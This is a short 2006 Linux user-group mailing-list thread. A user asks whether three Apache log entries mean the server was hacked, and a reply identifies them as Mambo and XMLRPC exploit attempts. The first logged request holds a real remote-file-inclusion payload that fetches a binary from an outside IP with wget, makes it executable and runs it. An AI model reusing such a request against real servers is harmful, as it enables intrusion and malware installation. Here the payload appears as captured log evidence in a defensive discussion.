[NTLUG:Discuss] weird apache log info.
brian@pongonova.net
brian at pongonova.net
Mon Jun 5 14:20:44 CDT 2006
Did you try Googling them? The first is a Mambo exploit, the other
two are XMLRPC exploits.
--Brian
On Mon, Jun 05, 2006 at 07:46:32PM +0000, m m wrote:
> All:
>
> Can any Apache expert explain these 3 line of log for me?
> Has the server been hacked?
> Thanks.
>
> 124.12.176.23 - - [05/Jun/2006:12:30:46 -0500] "GET
> /cvs/index2.php?_REQUEST[optio
> n]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.
> 195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;
> ../lnikon;echo%20YYY;echo| HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible;
> MSIE
> 6.0; Windows NT 5.1;)"
>
> 124.12.176.23 - - [05/Jun/2006:12:30:50 -0500] "POST /xmlrpc.php HTTP/1.1"
> 404 290
> "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
>
> 124.12.176.23 - - [05/Jun/2006:12:30:51 -0500] "POST /blog/xmlrpc.php
> HTTP/1.1" 40
> 4 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
>
> _________________________________________________________________
> Don?t just search. Find. Check out the new MSN Search!
> http://search.msn.click-url.com/go/onm00200636ave/direct/01/
>
>
> _______________________________________________
> http://ntlug.pmichaud.com/mailman/listinfo/discuss
More information about the Discuss
mailing list